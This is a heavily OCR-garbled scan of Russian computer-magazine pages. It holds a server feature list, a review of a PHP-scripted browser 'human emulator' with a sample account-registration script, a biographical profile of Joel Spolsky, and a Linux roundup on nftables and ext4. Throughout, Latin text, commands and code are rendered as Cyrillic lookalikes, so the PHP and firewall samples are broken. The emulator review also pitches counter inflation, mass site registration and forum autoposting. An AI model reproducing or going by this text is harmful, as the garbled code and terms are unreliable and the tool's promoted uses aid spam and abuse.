Функциональность почтового сервера : 

• ІМАР и РОРЗ : перенаправление поль- 
зователя на ІМАР или РОРЗ-бэкенд с 
использованием внешнего НТТР-сервера 
аутентификации 

• ЗМТР: проверка юзера с помощью вне- 
шнего НТТР-сервера аутентификации и 
перенаправление соединения на внут- 
ренний ЗМТР-сервер 

• Методы аутентификации: 

1. РОРЗ: ЮЗЕК/РАЗЗ , АРОР, АЬТН ЬОСШ/ 
РЬАШ/СКАМ-МБ5; 

2. ІМАР: ЬОСШ, АЬТН ЬОСШ/РЬАШ/ 
СКАМ-МБ5 ; 

3. ЗМТР: АЬТН ЬОСШ/ РЬАШ/СКАМ-МБ5 ; 

• Поддержка ЗЗЬ 

Функциональность НТТР-сервера: 

• Работа с виртуальными серверами, оп- 




Лссекя ГпгЬі<І<1гп! 
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Поднимаем РазіѴѴеЬБегѵег 



ределяемыми по ІР-адресам/именам 

• Поддержка кеер-аііѵе и ріреііпеб- 
соединений 

• Настройка формата ведения логов 

• Специальные страницы для отображе- 
ния ошибок 

• Ограничение доступа по ІР либо по 
паролю (Вазіс-аутентификация) 

• Наличие методов РИТ , БЕЬЕТЕ , МКСОЬ , 
СОРУ и МОѴЕ 

• Ограничение скорости передачи ответов 

• Ограничение числа одновременных 
соединений и запросов 

• Поддержка ЗЗЬ 

• Распределение нагрузки 

• Отказоустойчивость 
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Пишем сценарий для эмулятора своих действий :] 



<?рЬр 

// Данный код необходим для запуска 
Ншпап Етиіабога 

гедиіге ("../.. /Тетр1абез/хесіапб_ 
Ьитап_ети1абог .рЬр" ) ; 

// переходим на страницу регистрации 
$Ьгоѵ\;зег->паѵідабе ( "Ьббр : //чалам. 
хапда . сот/гедізбег . азрх" ) ; 
$Ьгочлзег->члаіб_бог (240 , 1) ; 



Тулза имеет полное право на место в повседнев- 
ном арсенале утил. Если тебе нужен быстрый 
вустановке, простой вуправлении.а главное 
— безопасный и отказоустойчивый веб-сервер 
с комплектом дополнительных софтин — ищи 
архив на нашем диске :]. 

ИЗІШШИ нимАМ еміхатор 

0УМ&ОУЗХР/ѴІ5ТА 

ИаЫДН ЦМДМЕМШДТОВІМРО 

Прога воспринимаеттри вида событий: 

• Движения мышки 

• Ввод с клавы 

• Клики мышки 

Какты понимаешь, сфера примененияутилы 
довольна широка и ограничивается лишьтвоей 
фантазией. Для примера: 

• Накрутка счетчиков /автокликинг по 
ссылкам 

• Автоматический сбор данных с веба 

• Автоматическая регистрация на сайтах 

• Автопостинг по форумам/блогам/ново- 
стным лентам 

Словом, софтина обеспечиваетполнуюэмуляцию 
действий юзера, включая движения мышью и 
работу с клавой. Утила обладаетрядом особен- 
ностей, среди которых: 

• Корректная работа с АДАХ 

• Корректная работа в защищенных об- 
ластях сайта 

• Задание различных параметров брау- 
зера (размер окна, ебс) 

• Эмуляция движений /кликов мышкой 

• Эмуляция нажатий клавиш с клавы 

Принцип работы тулзы основан на РНР-сцена- 
риях, в которых необходимо описывать действия 
приложения. Для примера при веду скрипт регис- 
трации на портале ШрУ/хапда.сот . написанный 
создателями продукта: 



// заполняем поля ввода данными 
/ /логин 

$ іприб ->зеб_ѵа1ие_Ьу_ 
пишЬег ( 0 , " абшудбегугбіпі " ) ; 

/ / пароль 

$ іприб - >зеб_ѵа1ие_Ьу_ 
пишЬег (1 , "гбе34оби2 " ) ; 

/ / повторим пароль 
$ іприб ->зеб_ѵа1ие_Ьу_ 
пишЬег (2 , " гбе34оби2 " ) ; 

//ешаіі 

$ іприб - >зеб_ѵа1ие_Ьу_ 
пишЬег (3 , " ас!456435тіп1@Ьозб . сот" ) ; 
// вызываем диалог ввода капчи 
$сарбсЬа=$арр->Ыд_сарбсЬа_бгот_ 
ішаде_питЬег ( 1 ) ; 

$ іприб ->зеб_ѵа1ие_Ьу_ 
пишЬег ( 4 , $сарбсЬа) ; 

/ / устанавливаем дату рождения 
// 1 

$ 1 і з бЬох- > з е 1 ес б_пиш_ѵа 1ие_Ьу_ 
пишЬег (1,1) ; 

// май 

$ 1 і з бЬох - > з е 1 ес б_пиш_ѵа 1ие_Ьу_ 
пишЬег (0,5) ; 

// 1980 

$ 1 і з бЬох- >з е 1 ес б_пиш_ѵа 1ие_Ьу_ 
пишЬег (2,51) ; 

// устанавливаем чек "я согласен" 
$сЬескЬох->зеб_сЬескес!_Ьу_ 
пишЬег ( 0 , " бгие " ) ; 

// нажимаем на кнопку 
$Ьиббоп->с1іск_Ьу_пишЬег ( 0 ) ; 
$Ьгочлзег->члаіб_бог (240 , 1) ; 

// выходим 

$арр-><диіб ( ) ? 

?> 



Для бесперебойной работы софтины потребу- 
ется не менее 256 метров оперативы, 50 метров 
свободного места на винте и ѴѴіп ХР/Ѵізіа, а также 
установленный РНР и прямые руки :). 

Р.5. Утила платная, но ведь за хороший софт 
заплатить не жал ко, правда? 
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Джоэл — частый гость на 
различных ІТ-конферен- 
циях 



Внутри офиса все обуст- 
роено по высшему классу 



Вход в Нью-Йоркский 
офис Род СгеекЗоІіѵѵаге 







а 



ДЖОЭЛ 

И ПРОГРАММНОЕ 
ОБЕСПЕЧЕНИЕ 

История Джоэля Спольски — программиста и писателя 

Сегодня я расскажутебе об очень интересном человеке, который в свои 44 
года успел многое. Его зовут Джоэл Спольски, и он нетолько служил в израиль- 
ской армии и работал в Місгозо^, но и создал собственную ІТ-компанию, вло- 
жив нее душу, написал несколько книг, в числе которых имеются бестселлеры, 
а потом и вовсе увлекся ѵѵеЬ 2.0 стартапами. 



Высокие технологии входят в нашу жизнь 
семимильными шагами. Знаменитый критерий 
Дозуа: «НідЬ ІесЬ. І_оѵѵ ІЛе» («Высокиетехноло- 
гии. Низкий уровеньжизни») перестал быть лишь 
фразой, емкоописывающейжанр киберпанк. Он 
уже вполне способен претендовать на звание 
правдоподобной характеристики наших реалий. 
Притаком положении вещей совсем неудиви- 
тельно, что личностей, имеющихто или иное 
отношение ксфере ІТ, с каждым днем становится 
все больше. И пусть всем нам хорошо знакомы 
именатаких ІТ-знаменитостей и первопроходцев 
как Стивен Джобс, Ричард Столл ман или дядюш- 
ка Билли Гейтс (куда уж без него], мы незнаем ни 
в лицо, ни по имени многихдругихталантливых 
специалистов. 

За сценой сегодня гораздо сложнее следить — в 
последние 5-1 0 лет она сильно разрослась, 
конкуренция, в свою очередь, тоже стала гораздо 
жестче, а далеко не все талантливые специа- 
листы еще и хорошие менеджеры. Им зачастую 
не удается удачно «продать себя» или свои 
разработки. Многиетак и остаются личностями 
«широко известными в узких кругах». 

Но рубрика, в числе прочего, была придумана 
и мен но для того, чтобы ликвидировать эти 



пробелы. Наш сегодняшний герой нетолько 
интересный человек, но и неплохой менеджер, 
и пусть тебя не смущает, что его имя не является 
нарицательным и знакомым каждому школьнику. 
Представляю тебе Джоэля Спольски — разра- 
ботчика ПО, экс-сотрудника МісгозоД, автора 
ряда книг, более чем тысячи статей и популярного 
блога «ЗоеІопЗоДѵѵаге», а также успешного 
предпринимателя и основателя нескольких 
стартапов. 

ИЗ АЛЬБУКЕРКЕ В КИБУЦУ 

Исходя из перечисленных заслуг, уже можно 
понять, что мистер Спольски — личность весьма 
многогранная и не привыкидти по накатанной 
колее. Забегая вперед, скажу, что это впечат- 
ление совершенно верно — его судьбу, в самом 
деле, трудно назвать«обыкновенной» или 
«ничем не примечательной». 

Но каким бы человекни был особенным, начало 
жизненного пути, как правило, сводится ксухим 
строчкам, похожим на анкетные данные — 
«родился, учился». С этим вряд л и можно что-то 
поделать, так что не будем ими пренебрегать — 
Джоэл Спольски родился 1965 году, в городе Аль- 
букерке, штат Нью-Мексико, где благополучно 



прожил до 15 лет. Стоитсказать, что отец Джоэля 
— новозеландец, и, благодаря этому, наш герой 
теперь имеет двойное гражданство и возмож- 
ность свободно, в любое время, посещать родину 
смешных птичеккиви. Впрочем, мы отвлеклись. 
Когда Джоэлю исполнилось 1 5, все семейство 
Спольски перебралось на постоянное местожи- 
тельства в Израиль, а если точнее — в Иерусалим. 
Школу наш герой заканчивал на новом месте, и 
уже тогда был серьезно увлечен компьютерами. 
По его собственному признанию, программи- 
ровать он начал еще до переезда, находясь в 
Альбукерке. Плюс, у мистера Спольски, очевидно, 
оченьхорошая память на даты и цифры, так 
какой уточняет, что на дворе был 1 978 год и его 
первой машиной стал ІВМ-360, стоявший в 
вычислительном центре Университета Нью-Мек- 
сико. Замечу, что это сегодня любой 15-летний 
мальчишка увлечен компами и в них, какмини- 
мум, неплохо разбирается, а вто время интерес 
Джоэля можно было назвать экзотическим. 
Впрочем, думать о высокихтехнологиях было 
несколько преждевременно. Дело втом, что в 
Израиле военнообязанными являются даже 
девушки, не говоря уже о парнях. Так что после 
окончания школы Джоэл отправился вовсе не 
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САЙТ 5ТАСК0ѴЕРРЮѴѴ. НАЙ- 
ДИ 10 ОТЛИЧИЙ С СОСЕДНИМ 
СКРИНШОТОМ:) 



грызть гранит науки, а честно отдавать дол г 
названному отечеству. 

Он отслужил в парашютно-десантных войсках 
два года, правда, с поправкой на специаль- 
ную программу Ыасбаі. Благодаря последней, 
большую часть службы Спольски провел, отнюдь 
не маршируя по плацу в униформе с автоматом 
наперевес, а вкалывая на хлебозаводе Огапіт. 

То есть, программа фактически заменяла службу 
не менее полезной работой в кибуце — сель- 
скохозяйственной коммуне. Впрочем, оттакой 
замены пребывание Спольски в армии не стало 
более радужным. Полученное по окончании 
службы звание сержанта он до сих пор называет 
«абсурдом» и о службе вспоминает, в основном, в 
негативном ключе. «Я совершенно неспосо- 
бен подчиняться дисциплине, ужасен в любых 
вопросах, касающихся физической подготовки, 
и ненавижу каждую минуту, которую провел в 
армии», — пишетон в своем блоге. 

ЧЕЛОВЕК, КОТОРЫЙ 
УВОЛИЛСЯ ИЗ МІСК050РТ 

Нет ничего странного, что, освободившись от 
военных обязанностей, Джоэл на всех парах 
помчался обратно в Штаты, получать обра- 
зование (видимо, стремясь, заодно, убраться 
подальше от всех этих хлебозаводов и коммун]. 

И так как при поступлении речь шла уже не о физ. 
подготовке, а о нежно любимых компьютерах 
и мозговой деятельности, все сложилось как 
нельзя лучше. Спольски без проблем поступил в 
университет Пенсильвании, где отучился год, а 
после перевелся в один из престижнейших вузов 
планеты — Йельский университет. Именно его-то 
Джоэл и окончил с отличием в 1991 году, получив 
желанную степень бакалавра в области вычисли- 
тельной техники. 

Адальше, какэто и бывает со всеми выпускника- 
ми, начиналась взросло-самостоятельная жизнь. 
Пришла пора задуматься о карьере. В этом воп- 
росе Джоэлю Спольски, можно сказать, повезло 
— после окончания университета первым местом 
его работы стала, ни много, ни мало, компания 
Місгозоіі. Конечно, «мелкомягкие» еще не были 
тем Великим и Ужасным Місгозоіі, коим являются 
сейчас, но, все же, в М5 работало порядка пяти 
тысяч человек, уже вышла в свет ѴѴіпсІоѵѵз 3.1 и 
3.0, придумали и собрали МісгозоИ ОІІісе, и не за 
горами был релиз 95-ой. Джоэл занял в молодом 
и стремительно развивающемся Місгозоіі далеко 
не последнюю должность — он стал руководите- 




САЙТ 5ЕВѴЕВ РАШ.Т, — 
ПРАКТИЧЕСКИ КЛОН 5ТАСК 
ОѴЕРРЬОѴѴ 



лем проекта, возглавив команду, работавшую 
над Ехсеі. Спольски рассказывает, что отвечал 
за «программируемость», планомерно заменяя 
ранее использовавшийся язык Ехсеі тасго 
(ХЕМз) на Ехсеі Вазіс, который создавался на 
основе Ѵізиаі Вазіс. Впоследствии язык пе- 
реименовали вѴізиаІВазісдля приложений. 

И все бы ничего, Джоэл действительно очень 
хотел делать карьеру и дерзать, а Місгозоіі 
была для этого отличным плацдармом, только 
вот при всем притом... Спольски еще хотелось 
иметьхоть какую-то жизнь вне работы. Например, 
личную. Так, разнообразия ради. Преследуя та- 
кие, в общем-то, нехитрые цели, он перебрался в 
Нью-Йорк, где честно попытался работать в кон- 
сультационном центре Місгозоіі. Джоэля хватило 
минут на десять, послечегоон в ужасе уволился 
из компании, решив, что это явно не для него. 

Что поделать, не всем путь«от самых низов» или 
возложение лучшихлетжизни на алтарь карьеры 
кажутся перспективным, заманчивым и интерес- 
ным делом. И даже из Місгозоіі, когда тот пре- 
бывал в самом зените, тоже сбегали. Суммарно 
Спольски проработал на«мелкомягких»4года, 
уволившись в 1995. Следующие десять недель 
Джоэл провел, колеся по Штатам на велосипеде 
и размышляя, куда бы податься. В результате, 
уезжать куда-либо из Нью-Йорка он не пожелал, 
хотя там выбор вакансий для ІТ-шника, конечно, 
гораздо беднее, чем втойже Кремниевой долине. 
После Місгозоіі Спольски довелось поработать 
еще в двух конторах, не дотягивающих до уровня 
софтверного гиганта даже примерно — вѴіасот 
Іпіегасііѵе Зегѵісез и 5ипо Опііпе Зегѵісез. Первые 
являются огромным медийным холдингом, 
чье название расшифровывается какѴібео 
& Аисііо Соттипісаііопз. Им принадлежат, 
например, студии Рагатоипі и ОгеатѴѴогкз, 
а также несколько сотен телеканалов, в число 
которых входит МТѴ. Именно последним-то и 
занимался на новой работе Спольски. Нет, не 
самим каналом, конечно, а созданием для него 
сервера приложений. На новой должности Джоэл 
задержался еще на два года, после чего перешел 
к^поОпІіпеЗегѵісез — крупномуамериканскому 
провайдеру. 

Но ктому моменту стало ясно, что «работать на 
дядю»у Спольски получается откровенно плохо, 
даже если речь идет о дружном коллективе, в 
котором все втой или иной степени проникнуты 
идеями компании. Немалую рольсыграло ито, 
что мысль основать собственную компанию за- 




ОДИН ИЗ БЕСТСЕЛЛЕРОВ СПОЛЬ- 
СКИ — «ДЖОЭЛ О ПРОГРАММИРО- 
ВАНИИ» 



села у Джоэля в голове уже очень давно и плотно. 
Для воплощения идеи вжизньон окончательно 
созрел, лишьсменив несколько мест работы, на- 
бравшись немалого опыта и обзаведясь связями 
и единомышленниками. 

СВОЙ ЛУНА-ПАРК 

Как-тоуДжоэля Спольски спросили в интер- 
вью, чтобы он посоветовал тем, кто собирается 
начинатьсвоедело (речь, конечноже, шла об 
ІТ-сфере). Джоэл пошутил, сказав: «Одумайтесь и 
не делайте этого!», но потом все же ответил серь- 
езно. И главной рекомендацией было: «Найдите 
себе хотя бы одного сооснователя, а лучше двоих- 
троих, потому что вам действительно понадобят- 
ся партнеры и единомышленники». 

Когда сам Спольски решился основать свою 
фирму иуволился из5ипо, на дворе стоял 2000-й 
год. Партнером по бизнесу для нашего героя стал 
его друг— Майкл Праойр. С ним Джоэл познако- 
мился на последнем месте работы, все в том же 
Оипо Опііпе Зегѵісез. Майкл —тоже специалист 
в области вычислительнойтехники сдипломом 
Дартмутского колледжа и тоже имеетопреде- 
леннуютягу к писательству, например, некоторое 
время он вел собственную колонку в журнале 
Маке МадаЛпе. 

С партнером Спольски не прогадал. Когда с 
момента старта общего дела прошло 6 лет, 

Прайор написал усебя на сайте: «Мы в бизнесе 
уже целых 6 лет, и я с нетерпением жду следую- 
щих шести». Как показало время, слова на ветер 
Майкл бросать не склонен — он и по сей день 
работаетв Еод СгеекЗоІІѵѵаге. Да, именнотакое 
название в 2000 году получило их начинание. 

Что любопытно, ни каких ко нкретных за дум о к и л и 
наработоку начинающих ста ртаперов не было. 
Имелось разве что большое желание «построить 
свой Луна-парк», то есть — создать та кую софтвер- 
ную компанию, в которой действительно хотелось 
бы работать, своего рода идеал и эталон. И этот 
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УЮТНЫЙ БЛОЖЕК МИСТЕРА 
СПОЛЬСКИ 



идеал они представляли себеоченьхорошо, 
вплоть до самых мелких подробностей (достаточ- 
но почитать в блоге Спольски отом, сколько 
вниманияуделялось проектированию офиса и 
его «начинке»]. Сейчас, спустя девять лете мо- 
мента основания компании, можно сказать, что 
почти все задуманное у них получилось. Джоэл, 
например, любит похвастаться в интервью или 
у себя в блоге цифрами статистики, которые на 
определенный моментвремени гласили, что 
из Род СгеекБойѵѵаге вотуже 6 лет не увольнялось 
ни одного сотрудника. Совсем не удивительно для 
компании, на официальном сайте которой красует- 
ся схема: «Лучшие рабочиеусловия Лучшие 
программисты Лучшее ПО -> РгоШ». 

«ТУМАННАЯ ГАВАНЬ» 

Чемже именнозанимается Род СгеекЗоЛѵѵаге? 
Это небольшой штатталантливых прогеров, чья 
работа полностью сосредоточилась вокругсозда- 
ния инструментов для планирования проектов, 
хотя исходно фирма начинала с консалтинговой 
деятельности. Ріо «завязать» с консультациями 
Род Сгеек пришлось довольно быстро. Такуж 
совпало, что в начале 2000 года лопнул пузырь 
доткомов, утянув на дно огромное количество ІТ- 
компаний и подорвав доверие ктаким проектам 
вообще. Впоследствии спрос на консалтинговые 
услуги в этой области тоже резко пошел на спад. 
Тогда компания и переориентировалась на 
создание и продажу софта, притом без какого- 
либо ущерба для себя. Уже в 2001 году Род Сгеек 
выпустила в светсразудве софтины — РодВидг и 
СТуйевк. РодВидг изначально был программой 
для внутреннего пользования, но наступили 
тяжелые времена, консультациям пришел конец, 
и он превратился в Продукт. Со временем из 
обыкновенной баг-трекалки РодВидг эволю- 
ционировал в полноценную систему управле- 
ния проектами. СТуРезк, в свою очередь, был 
СМ5-кой (сопіюпі: тападетепізузіюпп, система 
управления контентом, или же «конструктор 
сайтов»]. В отличие от РодВидг, он стреском 
провалился, пусть и не сразу. Над СТуРезк про- 
должали работать вплоть до 2003 года, но потом 
все же оставили попытки реанимировать, по сути, 
мертворожденную прогу. Проблема заключа- 
лась в наличии на рынке более интересных и 
продуманных конкурентских программ — взять 
хотя бытуЗоотІа, которая, ктомуже, совершенно 
бесплатна. 



В Р06СКЕЕК МОЖНО ВСТРЕ- 
ТИТЬ ДАЖЕ БЕТМАНА! 

Позже у Род Сгеек появился и третий продукт — 
Род Сгеек СорИоР удаленная администрилка в 
помощь спецам технической поддержки и иже 
с ними. Но вотна нем-то список продукции Род 
Сгеек и заканчивается. Эти три софтины — все, 
что было выпущено Спольски и сотоварищами 
за прошедшие годы, и все, чем ониторгуют. 

Какни парадоксально, компания при этом не 
обанкротилась и продолжает успешно работать (в 
основном, получая деньги с обновления версий 
имеющегося ПО]. 

ДРУГИЕ ИПОСТАСИ 
джоэля СПОЛЬСКИ 

Пусть покорить рынок программного обеспе- 
чения у Род Сгеек не вышло, Джоэл Спольски 
несильно расстроился по этому поводу. Создав 
компанию, которая нехватаетзвезденеба, но 
в которой ему и его сотрудникам хорошо и ком- 
фортно работается, он, похоже, вполне удовлет- 
ворился достигнутым. Ктомуже, одновременно 
с открытием собственной фирмы Джоэл дал 
зеленый свети еще одному начинанию — в 2000 
году он завел личный блог, найти который можно 
по адресу ЫірУ/ѵѵѵѵѵѵ^оеІопзо^ѵѵаге.сопп . 

Как выяснилось, у мистера Спольски есть, что по- 
ведатьлюдям, и он оченьлюбитписать: часто, со 
вкусом и неограничивая себя объемами и рамка- 
ми. В блоге Джоэл рассказываето самых разных 
вещах, начиная от статей, целиком и полностью 
посвященных различным сторонам программи- 
рования и заканчивая советами, каклучше вести 
себя во время собеседования при приеме на 
работу. Управлению персоналом, менеджменту и 
другим «социальным» аспектам ведения бизнеса 
здесь вообще уделяется немало внимания — это 
одна из излюбленныхтем нашего героя. 

В итоге, ресурс ЗоеІопЗо^ѵѵаге набрал огромную 
популярность нетолько в программерских и 
ІТ-шных кругах — своим легким стилем и юмором 
Спольски сумел привлечь и не столь искушенных 
читателей. Одното, что его статьи переведены 



добровольцами на 42 языка (Великий и Могучий 
там тоже имеется], уже говорит само за себя. 

И хотя Джоэл в открытую никогда не называл за- 
пуск блога РВ-ходом, его популярность, конечно, 
не могла не сказаться на репутации и финансо- 
вых показателях Род СгеекЭо^ѵѵаге. Широкая 
публика узнала о маленькой компании суникаль- 
ными условиями работы во многом благодаря 
именно этому блогу и таланту мистера Спольски 
красиво и ярко излагать. Одним только ведением 
блога наш герой не ограничился. Натекущий 
моментон написал уже пять книг, втом числен по 
мотивам своих сетевых публикаций. Некоторые 
его труды (в частности, «Джоэл о программирова- 
нии», «Лучшие примеры разработки ПО» и «Руко- 
водство Джоэля Спольски по подбору програм- 
мистов и управлению ими»] были переведены на 
русский и купить их не составит большого труда. 
Лишь парулет назад Джоэл Спольски решил 
отвлечься от работы над немногочисленными 
проектами Род Сгеек и писательства. Видимо, 
ему захотелось попробовать что-нибудь новое, 
итогда насветпоявился сайтБіаскОѵегНоѵѵ 
( ЬЛрУ/ѵѵѵѵѵѵ.зІаскоѵегРоѵѵ.сопп ]. Кратко этот 
ресурс можно охарактеризовать как помесь Бідд 
с ѴѴікіресІіа и любым сайтом вопросов-и-ответов. 
Из названия легко понять, на какую аудиторию 
ориентирован проект. Совершенно верно — на 
программистов. Предполагается, что, когда утебя 
в мозгууже происходит«переполнение стека», 
можнозайти сюда и поискать решение проблемы, 
или же, если готового ответа не нашлось, задать 
вопрос. Удобная система голосования за вопросы 
и ответы (аналогичная Оідд], система репутации, 
возможность правки чужих постов и коммен- 
тариев (всеобщее, как в ѴѴікі) и возможность 
писать и комментировать из-под апопутоііз’а — 
делаютЭіаскОѵегйоѵѵ очень полезным ресурсом. 
Брат-близнец Эіаск ОѵегРоѵѵ — сайтБегѵег 
Раиіі ( ЬЛрУ/ѵѵѵѵѵѵ.зегѵеНаии.сопп ] появился чуть 
позже, и он, как нетрудно догадаться, охватывает 
не софтверные, а «железные» проблемы. Что 
касается принципа работы, здесь Бегл/егРаиК 
совершенно аналогичен Біаск ОѵегРоѵѵ. Оба 
сайта юзаютОрепЮ. Пока эти проекты совер- 
шенно бесплатны, на них нет ни контекстной, ни 
какой -л ибо другой рекламы, ни платныхуслуг. 
Какдолгоэто продлится, неизвестно, потому 
какопределенную популярность оба сайта уже 
снискали, и дальше она явно будет только расти. 

О монетизации своих новых стартапов Джоэл 
Спольски пока не говорил ни слова, нс 
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Обзор интересных новшеств мира Ьіпих 




Ыпих развивается стремительно. Каждый год мы становимся сви- 
детелями очередных витков эволюции этой операционной систе- 
мы. Развиваются даже те части, развитие которых, казалось бы, 
уже нетребуется. Совершенствуются файловые системы, обновля- 
ются планировщики процессов, заменяется система фильтрации 
пакетов. В этой статье мы рассмотрим наиболее значимые новшес- 
тва Ыпих. Опробовать их можно будетуже в этом году. 



т ОЧЕЛОВЕЧИВАНИЕ 
ПАКЕТНОГО ФИЛЬТРА 

Система фильтрации пакетов ядра Ыпих про- 
шла долгий путь развития. В ядре версии 2.0 
появилась первая реализация ВВО-подобного 
межсетевого экрана іріѵѵ и закрепленная за 
ним утилита управления ірілл/асіпп. В версии 2.2 
их сменил файрвол ірсбаіпз. С выходом ветки 
2.4 он, в свою очередь, был вытеснен связкой 
пеКіКег/ірІаЫез. ЫеКіКег действительно 
хорош: он грамотно спроектирован; обладает 
мощными возможностями для конфигурирова- 
ниятакихфич, кактрансляция сетевыхадре- 
сов, прозрачное проксирование, перенаправ- 
ление трафика, балансировка нагрузки; умеет 
отслеживать состояние соединений (зІаІеМ 
ЛгеѵѵаШпд]. Это позволяет распознавать и 
блокировать, например, зІеаКЬ-сканирование; 
а благодаря дополнительным плагинам он 
способен обрабатывать пакеты практически 
любого типа. Огорчаеттолько способ его кон- 
фигурирования, который основан на передаче 



невнятных аргументов командной строки 
утилите ірІаЫез. 

Можно долго спорить о преимуществах и 
недостатках способа настройки, предлагаемого 
іріаЫез, но факт остается фактом: он слишком 
громоздок и ориентирован на машину, а не че- 
ловека. Команда разработчиков пеіШегуже не 
раз смотрела в сторону альтернативных систем 
конфигурирования, предложенных пакетным 
фильтром рі и различными обертками вокруг 
іріаЫез (например Іегт, і : егт.і : оо-рго]ес1:5.огд]. 
Переписать только самуутилиту не пред- 
ставлялось возможным, потому какона была 
тесно связана с кодом ядра. Раіхіск МсНагбу, 
один из активных разработчиков подсистемы 
пеШКег, взялся за переработку всей системы 
фильтрации пакетов. Надо сказать, она и без 
того страдала отдругих недостатков (необходи- 
мость в перезагрузке всех правил во время их 
обновления, возможностьзадаватьтолько одну 
цельдля каждого правила, непродуманный ме- 
ханизм расширений, слишком плоская модель 



кода, не допускающая создавать высокоуров- 
невые абстракции, противоречивые способы 
сопоставления с шаблоном]. 

В результате на свет появился п^аЫез — пакет- 
ный фильтр нового поколения, состоящий из 
трех взаимосвязанных частей: 

1. Пакетный фильтр, работающий внутри ядра. 

2. Утилита пользовательского уровня пИ 

3. Библиотека ІіЬпІ, связывающая код ядра и 
утилиту піХ через механизм пеШпк. 

Утилита піХ читает файл конфигурации (который 
теперь похожскорее на скрипт, чем на список 
правил), генерирует на его основе простой 
компактный псевдокод и передаетэти данные 
ядру. Код піІаЫез, работающий внутри ядра, 
разбирает псевдокод и применяетего правила 
к проходящим по цепочкам пакетам. 

Для конфигурирования піХ применяется насто- 
ящий язык программирования, который позво- 
ляетзадавать условия, создавать переменные, 
выполнять математические операции. Он прост 
в освоении и достаточно развит для создания 
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сложнейших правил обработки пакетов. При- 
веденный автором проекта код фильтрации 
исходящего трафика выглядиттак: 

Пример конфигурационного 
файла пКаЫез 

іпсіисіе " ірѵ4-НіШег " 

сііаіп ГіШег оиСриС { 

сС зСаСе езСаЫізІіесІ, геІаСес! 
ассерС 

Сер сІрогС 22 ассерС 
соипРег сігор 

} 

А способ инкрементального добавления 
правил очень похож на то, какэто делается в 
ОрепВЗО: 

# пРР асісі гиіе оиРриР Сер сірогр 22 
Іод ассерр 

Генерируемый на выходе псевдокод прост 
и прямолинеен. Львиную долю работы по 
проверке правил возложили на компилятор 
пЛ. Это позволило существенно сократить код 
фильтрации, работающий внутри ядра. Теперь 
он выполняеттолько базовый набор действий, 
таких как разбор пакетов, сравнение данных 
ит.д. 

В отличие от ірІаЫез, утилита пЛ нетактесно 
связана с ядром и представляет собой всего 
лишь фронтенд для генерации псевдокода или 
инкрементального добавления новых правил. 
Возможность создания новых фронтендов, 



обладающих совершенно иным синтакси- 
сом правил, вытекает из общей архитектуры 
системы. 

ОЧЕРЕДНОЕ РАСШИРЕНИЕ 

Для Ыпих было создано и портировано из 
других опера ционок огромное количество 
файловых систем, но только одна из них 
может гордо носить имя официальной — это 
файловая система ехіЗ. 

ФС ехГЗ — уже третья эволюция стандартной 
файловой системы Ыпих. До нее была ехі2, 
в основном отличающаяся отсутствием 
журнала. Еще раньше была ехЛ первая 
файловая система, созданная специаль- 
но для Ыпих. Однако надолго в ядре она 
не задержалась (этому способствовали 
многочисленные ограничения, такие как 
максимальный размер в 2 Гб и отсутствие 
поддержки дат модификации файлов]. 
Четвертая реинкарнация файловой 
системы ехі: (июнь 2006] стала следстви- 
ем требований разработчиков — новые 
функции и возможности могли нарушить 
обратную совместимость или сделать 
файловую систему нестабильной и слишком 
сложной для поддержки. Спустя 5 месяцев 
предварительная версия ехі4 появляется в 
ядре Ыпих 2.6.19, помеченная как «экспе- 
риментальная разработка». Допиливание 
файловой системы продолжалось больше 
года, и только с выходом ядра версии 2.6.28 
(25 декабря] ех14 становится стабильной 
и рекомендованной для повсеместного 
тестирования. 



Из-за отсутствия требований к обратной 
совместимости разработчики ехі: 4 смогли 
применить самые изощренные техники для 
повышения производительности, надеж- 
ности и расширяемости файловой системы. 
Далее мы рассмотрим все ключевые нов- 
шества ех14, которые позволили ей стать од- 
ной из самых производительных и богатых 
на функциональность файловых систем: 

• 48-битная адресация блоков. Размер 
файловой системы ехіЗ ограничен 1 6 
терабайтами, а размер файла — двумя, 
что может быть недостаточно для больших 
хранилищ данных и систем потокового ве- 
щания мультимедиа. Файловая система ех14 
использует 48-битную адресацию блоков и 
доводит эти ограничения до фантастичес- 
кихвнашидниі экзабайта (1 Эб = 1 048576 
Тб] и 1 6 Тб соответственно. 

• Механизм пространственной записи 
файлов. Файловая система ехіЗ исполь- 
зуеттрадиционную методику слежения 
за блоками данных файлов, основанную 
на карте соответствия. Последняя пред- 
ставляет собой закрепленный за файлом 
списокадресов блоков файловой системы, 
хранящих информацию этого файла. Во 
время чтения или записи в файл файловая 
система проходит по карте соответствия в 
поисках нужного блока. Недостаток: низкая 
эффективность. Карта соответствия боль- 
шого файла может содержать от нескольких 
десятков до сотен тысяч записей, проход по 
которым отнимет значительное время. ФС 
ехі4 использует более современный подход. 
Он основан на так называемых экстентах, 
которые представляют собой непрерывную 
последовательность блоков, закрепленных 
за файлом. Там, где ехіЗ требовалась карта 
соответствия с Ютысячами элементов, 
ехі4 может хранить информациюозакреп- 
ленных за файлом блоках всего лишь в 
нескольких экстентах. Благодаря этому ме- 
ханизму ех14 стала более производительной 
и менее подверженной фрагментации. 

• Многоблочное распределение. Перед 
записью данных на диск файловая система 
должна найти нужное количество свободных 
блоков для размещения данных. ФС ехіЗ 
использует для этого технику поблочного 
распределения, когда за один проход может 
быть найден только один свободный блок. 
Эта особенность делает ехіЗ более медлен- 
нойвсравнениис другими современными 
файловыми системами. ФС ех14 хранит не 
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только информацию о количестве и адресах свободных блоков, но 
и данные об их непрерывных областях, которые обрабатываются за 
один проход. Это позволяет сократить время распределения блоков 
для новых данных и снизить уровень фра гм ентиро ванн ости ФС. 

• Отложенное распределение. В отличие от ехіЗ, которая распреде- 
ляет блоки под новые данные сразу, ех1:4 откладывает эту опера- 
цию насколько это возможно. Например, если приложение делает 
системный вызов ѵѵгііе () , чтобы дописать данные к существующему 
файлу, выделение блоков для этой операции в ехі4 будет отложено 
до момента фактической записи на диск. Та может произойти либо 
после вызова зупсП, либо в моментзаписи кэша на диск. В совокуп- 
ности с многоблочным распределением новый подходдает сущест- 
венный прирост производительности. 

• Предварительное распределение. Существует целый класс 
приложений, которым необходимо заранее выделять дисковое 
пространство под файлы. Это различные системы бэкапа, клиенты 
р2р-сетей и любые программы, от которых требуется стабильная и 
устойчивая работа. Еще совсем недавно для выполнения этой опе- 
рации приложениям приходилось самостоятельно создавать пустые 
файлы, заполненные нулями. Затем разработчики ввели функцию 

И Ьс ро5Іх_{аІІосаІе(), которая, по сути, занималась тем же самым. 

И только в последних версиях файловой системы ехіЗ и новой ехі4 
появилась возможность заранее распределить дисковое пространс- 
